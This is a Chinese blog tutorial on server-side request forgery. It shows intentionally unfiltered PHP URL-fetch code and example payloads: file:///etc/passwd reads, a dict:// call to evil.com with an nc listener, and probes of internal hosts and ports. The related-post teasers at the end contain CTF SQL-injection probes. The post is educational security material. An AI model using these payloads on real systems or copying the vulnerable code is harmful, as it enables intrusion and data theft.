ssrf学习

于 2024-08-25 22:13:50 发布
阅读量304 收藏 10
点赞数 3
文章标签: 学习 php nginx
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_69656902/article/details/141535953
版权

一、SSRF是什么?

SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。

二、SSRF漏洞原理

SSRF 形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能且没有对目标地址做过滤与限制。
比如,黑客操作服务端从指定URL地址获取网页文本内容,加载指定地址的图片,下载等等。利用的是服务端的请求伪造。ssrf是利用存在缺陷的web应用作为代理攻击远程和本地的服务器。

三、产生SSRF漏洞的函数

SSRF攻击可能存在任何语言编写的应用,接下来将举例php中可能存在SSRF漏洞的函数。
1.file_get_contents:

下面的代码使用file_get_contents函数从用户指定的url获取图片。然后把它用一个随即文件名保存在硬盘上,并展示给用户。

<?php
if (isset($_POST['url'])) 
{ 
$content = file_get_contents($_POST['url']); 
$filename ='./images/'.rand().';img1.jpg'; 
file_put_contents($filename, $content); 
echo $_POST['url']; 
$img = "<img src=\"".$filename."\"/>"; 
} 
echo $img; 
?>

2、sockopen():
以下代码使用fsockopen函数实现获取用户制定url的数据(文件或者html)。这个函数会使用socket跟服务器建立tcp连接,传输原始数据。

<?php 
function GetFile($host,$port,$link) 
{ 
$fp = fsockopen($host, intval($port), $errno, $errstr, 30); 
if (!$fp) { 
echo "$errstr (error number $errno) \n"; 
} else { 
$out = "GET $link HTTP/1.1\r\n"; 
$out .= "Host: $host\r\n"; 
$out .= "Connection: Close\r\n\r\n"; 
$out .= "\r\n"; 
fwrite($fp, $out); 
$contents=''; 
while (!feof($fp)) { 
$contents.= fgets($fp, 1024); 
} 
fclose($fp); 
return $contents; 
} 
}
?>

注意事项
一般情况下PHP不会开启fopen的gopher wrapper
file_get_contents的gopher协议不能URL编码
file_get_contents关于Gopher的302跳转会出现bug,导致利用失败
curl/libcurl 7.43 上gopher协议存在bug(%00截断) 经测试7.49 可用
curl_exec() 默认不跟踪跳转,
file_get_contents() file_get_contents支持php://input协议

四、SSRF中URL的伪协议

当我们发现SSRF漏洞后,首先要做的事情就是测试所有可用的URL伪协议。

file:/// 从文件系统中获取文件内容,如,file:///etc/passwd
dict:// 字典服务器协议,访问字典资源,如,dict:///ip:6739/info:
sftp:// SSH文件传输协议或安全文件传输协议
ldap:// 轻量级目录访问协议
tftp:// 简单文件传输协议
gopher:// 分布式文档传递服务,可使用gopherus生成payload

1、file

这种URL Schema可以尝试从文件系统中获取文件:

http://example.com/ssrf.php?url=file:///etc/passwdhttp://example.com/ssrf.php?url=file:///C:/Windows/win.ini

2、dict

这种URL Scheme能够引用允许通过DICT协议使用的定义或单词列表:

http://example.com/ssrf.php?dict://evil.com:1337/
evil.com:$ nc -lvp 1337
Connection from [192.168.0.12] port 1337[tcp/*]
accepted (family 2, sport 31126)CLIENT libcurl 7.40.0

五、SSRF漏洞利用(危害)

1.可以对外网、服务器所在内网、本地进行端口扫描,获取一些服务的banner信息;

2.攻击运行在内网或本地的应用程序(比如溢出);

3.对内网web应用进行指纹识别,通过访问默认文件实现;

4.攻击内外网的web应用,主要是使用get参数就可以实现的攻击(比如struts2,sqli等);

5.利用file协议读取本地文件等。.

6.各个协议调用探针:http,file,dict,ftp,gopher等

http:192.168.64.144/phpmyadmin/
file:///D:/www.txt
dict://192.168.64.144:3306/info
ftp://192.168.64.144:21

止痛曜
关注
  • 3
    点赞
  • 10
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
[网鼎杯 2018]Fakebook 1
bazzza的博客
12-20 1114
先注册一个账号看看,发现对blog有过滤,注册完登录进去发现界面是这样的, 可以看到页面下方打开了我们注册的blog,可以大胆的推测他可以进行ssrf,但是blog在注册时是经过过滤的,只能是固定的格式,看起来是难以利用的。 然后,我看别人的wp,对目录扫描后可直接扫描出来robots.txt和flag.php,我自己也扫了一下, https://blog.csdn.net/weixin_43940853/article/details/105081522 ...
SSRF学习(8)URL Bypass
m0_64417923的博客
05-19 451
什么是Bypass? 大家知道,网络安全设备一般都是应用在两个或更多的网络之间,比如内网和外网之间,网络安全设备内的应用程序会对通过他的网络封包来进行分析,以判断是否有威胁存在,处理完后再按照一定的路由规则将封包转发出去,而如果这台网络安全设备出现了故障,比如断电或死机后,那连接这台设备上所以网段也就彼此失去联系了,这个时候如果要求各个网络彼此还需要处于连通状态,那么就必须Bypass出面了。 Bypas顾名思义,就是旁路功能,也就是说可以通过特定的触发状态(断电或死机)让两个网络不通过网络安全设备的系
SSRF漏洞file伪协议之[网鼎杯 2018]Fakebook1
qq_58970968的博客
07-06 1505
关于SSRF漏洞(服务器端伪造)参考SSRF漏洞原理攻击与防御(超详细总结)_零点敲代码的博客-CSDN博客_ssrf漏洞防御SSRF(Server-Side Request Forgery:服务器端请求伪造) 是一种由攻击者构造形成由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外网隔离的内部系统)SSRF攻击可能存在任何语言编写的应用,接下来将举例php中可能存在SSRF漏洞的函数。1、file_get_
SSRF学习记录
web1的博客
09-01 262
什么是SSRFSSRF全称是Server-Side Request Forgery,它就是攻击者诱使服务器向攻击者指定的域发送HTTP请求,可以用来建立恶意的连接 危害 1、针对服务器本身的SSRF攻击 1.1将stockApi参数中的 URL 更改为 http://localhost/admin 这应该显示管理界面。 <a href="/admin/delete?username=carlos">Delete</a> 1.2阅读 HTML ,确定删除目标用户的 URL,即
SSRF学习(6)FastCGI协议
m0_64417923的博客
05-16 198
这次.我们需要攻击一下fastcgi协议咯.也许附件的文章会对你有点帮助 FastCGI原理: Wikipedia对FastCGI的解释:快速通用网关接口(FastCommon Gateway Interface/FastCGI)是一种让交互程序与Web服务器通信的协议。FastCGI是早期通用网关接口(CGI)的增强版本。FastCGI致力于减少网页服务器与CGI程序之间交互的开销,从而使服务器可以同时处理更多的网页请求。 php-fpm 官方对php-fpm的解释是FPM(FastCG..
SSRF学习(4)Gopher协议POST请求
m0_64417923的博客
05-13 1185
和前两题一样,先使用file:///协议 http://127.0.0.1/flag.php 得到一个输入框 右键查看源代码: 得到key key=f80bb4e68df72b3f98569b958219be05 所以应该是通过key进入,从而得到flag,但是没有提交的按钮,所以我们要自己构造post请求,将这个key发送过去。 用gopher协议构造post请求: <?php ​ error_reporting(0); ​ if ($_SERVER["REM...
SSRF学习(1)
m0_64417923的博客
05-09 502
SSRF的定义与成因 SSRF(Server-Side Request Forgery:服务器端请求伪造)是一种由攻击者构造形 成,由服务端发起请求的一个安全漏洞。一般情况下,SSRF攻击的目标是从外网无法 访问的内部系统。(正是因为它是由服务端发起的,所以它能够请求到与它相连而与外 网隔离的内部系统) SSRF漏洞形成的原因大都是由于服务端提供了从其他服务器应用获取数据的功能 且没有对目标地址做过滤与限制。比如从指定URL地址获取网页文本内容,加载指定地 址的图片,下载等等。 ep: 最常见的是当
[网鼎杯 2018]Fakebook1
陈艺秋的博客
06-08 1240
结合起来得出结论,以上代码存在ssrf和反序列化,当我们注册后,把我们的信息序列化一下,然后存进data。注册的其他行数据,差不多都可以乱填,只有一个blog项,估计是后台做了一些限制(必须包含某些字符之类的),随便填会报错。得到关键信息,前面都没有注意这段报错信息,这里包含了一个反序列化函数,和一段路径,后面会用到。路径是之前注入的时候报错爆出来的,序列化值也不用自己生成,之前注入出来了,改长度和值就行。因为出现上面的情况,所以猜测不是字符型注入,用了一点小方法,出现计算,说明是整数型注入。
BUUCTF[网鼎杯 2018]Fakebook 1
snowlyzz的博客
05-01 877
来到首页先创建了一个用户 点击自己创建的用户admin: 发现url 疑似有sql注入。   ?n=1 and 1=1 正常回显   ?n=1 and 1=2 回显异常(存在SQL注入)   ?n=1 order by 1# 正常回显   ?n=1 order by 2# 正常回显   ?n=1 order by 3# 正常回显   ?n=1 order by 4# 正常回显   ?n=1 order by 5# 回显异常(判断存在4个字段) 直接联合查询,发现 uni...
[网鼎杯 2018]Fakebook1(BUUCTF闯关日记)
qq_64201116的博客
05-22 290
进入页面 源代码也没有什么东西,就先尝试一下注册一个账号试一下 注册成功后,可以进入页面看一眼,发现有一个自己的账号可以点进去,那就看看有什么 一看到url?no=1 DNA都动了一下,不假思索想到SQL注入,尝试一下 ?no=1 and 1=1 #咩问题 ?no=1 and 1=2 #出错的页面(所以多半存在sql注入) ?no=1 order by 4 没问题 ?no=1 order by 5 出错的页面(存在4个字段) 使用显错注入 同时这里还用到了内敛注释绕过,因为直接u
BUUCTF [网鼎杯 2018]Fakebook 1
weixin_45642610的博客
01-19 4873
BUUCTF [网鼎杯 2018]Fakebook 1 join(注册)一个账号,按用户名进入主页 发现注入点no no=1 order by 4#没事 no=1 order by 5#报错,有4列 no=-1 union/**/select 1,2,3,4#过滤了(union select)用/**/代替空格 回显位是2,注意到有反序列化函数。 爆表名 no=-1 union/**/select 1,group_concat(table_name),3,4 from information_sc
题解:BUUCTF [网鼎杯 2018]Fakebook 1
qq_62886656的博客
06-14 714
题解
[网鼎杯 2018]Fakebook1解题思路
xiyuanyue的博客
10-08 340
s:3:"age";s:4:"blog";6、一般flag存储在根目录的flag文件或者flag.php文件修改data 数据O:8:"UserInfo":3:{s:4:"name";s:3:"age";s:4:"blog";
BUUCTF——[网鼎杯 2018]Fakebook
最新发布
m_de_g的博客
04-24 646
【代码】BUUCTF——[网鼎杯 2018]Fakebook。
学习ssrf相关的知识体系
04-27
好的,关于学习SSRF(Server-Side Request Forgery)相关的知识体系,我可以给你一些建议: 1. 理解SSRF的概念和原理:SSRF是指攻击者利用服务器端应用程序的漏洞,构造恶意请求,从而在未经授权的情况下访问和攻击...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值